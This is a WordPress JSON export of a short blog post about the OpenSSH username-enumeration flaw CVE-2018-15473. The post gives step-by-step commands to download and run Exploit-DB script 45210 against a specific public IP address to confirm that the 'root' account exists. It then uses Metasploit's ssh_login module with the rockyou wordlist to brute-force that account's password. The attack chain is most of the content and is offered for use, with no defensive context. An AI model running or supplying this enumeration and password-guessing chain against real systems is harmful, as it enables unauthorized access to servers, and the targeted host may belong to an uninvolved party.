﻿{"id":1050,"date":"2021-04-02T04:56:21","date_gmt":"2021-04-01T20:56:21","guid":{"rendered":"https:\/\/byy3.com\/?p=1050"},"modified":"2021-04-02T05:35:41","modified_gmt":"2021-04-01T21:35:41","slug":"openssh-2-3-to-7-7-username-enumeration-exploit","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1050","title":{"rendered":"OpenSSH 2.3 to 7.7 &#8211; Username Enumeration Exploit"},"content":{"rendered":"<h1 class=\"card-title text-secondary text-center\">OpenSSH 2.3 &lt; 7.7 - Username Enumeration (PoC)<\/h1>\n<p>username get guess with openssh 22 port<\/p>\n<p>https:\/\/www.exploit-db.com\/exploits\/45210<\/p>\n<div class=\"col-sm-12 col-md-6 col-lg-3 d-flex align-items-stretch\">\n<div class=\"card card-stats\">\n<div class=\"card-body \">\n<div class=\"statistics statistics-horizontal\">\n<div class=\"info info-horizontal\">\n<div class=\"row\">\n<div class=\"col-6 text-center\">\n<h4 class=\"info-title\">EDB-ID:<\/h4>\n<h6 class=\"stats-title\">45210<\/h6>\n<\/div>\n<div class=\"col-6 text-center\">\n<h4 class=\"info-title\">CVE:<\/h4>\n<h6 class=\"stats-title\"><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2018-15473\" target=\"_blank\" rel=\"noopener\" rel=\"nofollow\" >2018-15473<\/a><\/h6>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"card-footer \">\n<div class=\"stats h5 text-center\"><strong>EDB Verified:<\/strong>\u00a0<i class=\"mdi mdi-24px mdi-check\"><\/i><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"col-sm-12 col-md-6 col-lg-3 d-flex align-items-stretch\">\n<div class=\"card card-stats\">\n<div class=\"card-body \">\n<div class=\"statistics statistics-horizontal\">\n<div class=\"info info-horizontal\">\n<div class=\"row\">\n<div class=\"col-6 text-center\">\n<h4 class=\"info-title\">Author:<\/h4>\n<h6 class=\"stats-title\"><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/www.exploit-db.com\/?author=7320\" rel=\"nofollow\" >MATTHEW DALEY<\/a><\/h6>\n<\/div>\n<div class=\"col-6 text-center\">\n<h4 class=\"info-title\">Type:<\/h4>\n<h6 class=\"stats-title\"><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/www.exploit-db.com\/?type=remote\" rel=\"nofollow\" >REMOTE<\/a><\/h6>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"card-footer\">\n<div class=\"stats h5 text-center\"><strong>Exploit: <\/strong><a title=\"\" href=\"https:\/\/byy3.com\/go\/?url=https:\/\/www.exploit-db.com\/download\/45210\" data-toggle=\"tooltip\" data-placement=\"top\" aria-label=\"Download EDB 45210\" data-original-title=\"Download\" rel=\"nofollow\" ><i class=\"mdi mdi-download mdi-24px text-primary\"><\/i>\u00a0<\/a>\u00a0 \/ \u00a0\u00a0<i class=\"mdi mdi-code-braces mdi-24px text-primary\"><\/i><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"col-sm-12 col-md-6 col-lg-3 d-flex align-items-stretch\">\n<div class=\"card card-stats\">\n<div class=\"card-body \">\n<div class=\"statistics statistics-horizontal\">\n<div class=\"info info-horizontal\">\n<div class=\"row\">\n<div class=\"col-6 text-center\">\n<h4 class=\"info-title\">Platform:<\/h4>\n<h6 class=\"stats-title\"><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/www.exploit-db.com\/?platform=linux\" rel=\"nofollow\" >LINUX<\/a><\/h6>\n<\/div>\n<div class=\"col-6 text-center\">\n<h4 class=\"info-title\">Date:<\/h4>\n<h6 class=\"stats-title\">2018-08-16<\/h6>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"card-footer\">\n<div class=\"stats h5 text-center\"><strong>Vulnerable App:<\/strong><\/div>\n<hr \/>\n<p>1, get down<\/p>\n<\/div>\n<div>wget https:\/\/www.exploit-db.com\/download\/45210<\/div>\n<div>mv 45210 45210.py<\/div>\n<\/div>\n<div>chmod +x 45210.py<\/div>\n<div>python 45210.py --port 22 47.242.58.57 root<\/div>\n<div>if proble run with python2 must $ pip3\u00a0 install\u00a0 2to3<\/div>\n<div>pip3 install --upgrade paramiko==2.4.1<\/div>\n<div>python3 45210.py --port 22 47.242.58.** root<\/div>\n<div>(root) is guess username<\/div>\n<div>msfconsole<\/div>\n<div>search ssh<\/div>\n<div>use auxiliary\/scanner\/ssh\/ssh_login<\/div>\n<div>set rhost 47.242.58.**<\/div>\n<div>set username root<\/div>\n<div>set threads 55<\/div>\n<div>set stop_on_success true<\/div>\n<div>set pass_file \/usr\/share\/wordlists\/rockyou.txt<\/div>\n<div>show options<\/div>\n<div>run<\/div>\n<div>\/\/<\/div>\n<\/div>\n<div>open other terminal $ locate rockyou<\/div>\n<div>gunzip \/usr\/share\/wordlists\/rockyou.txt.gz<\/div>\n<div>\/\/<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1051\" data-original=\"https:\/\/byy3.com\/wp-content\/uploads\/2021\/04\/2021040121345913.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1053\" height=\"874\" title=\"OpenSSH 2.3 to 7.7 &#8211; Username Enumeration Exploit\u63d2\u56fe\" alt=\"OpenSSH 2.3 to 7.7 &#8211; Username Enumeration Exploit\u63d2\u56fe\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p>OpenSSH 2.3 &lt; 7.7 &#8211; Username Enumeration (PoC) usern [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[611,610,609,608,607],"class_list":["post-1050","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-enumeration","tag-exploit","tag-openssh","tag-vuln","tag-vulnerable"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1050","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1050"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1050\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1050"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1050"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1050"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}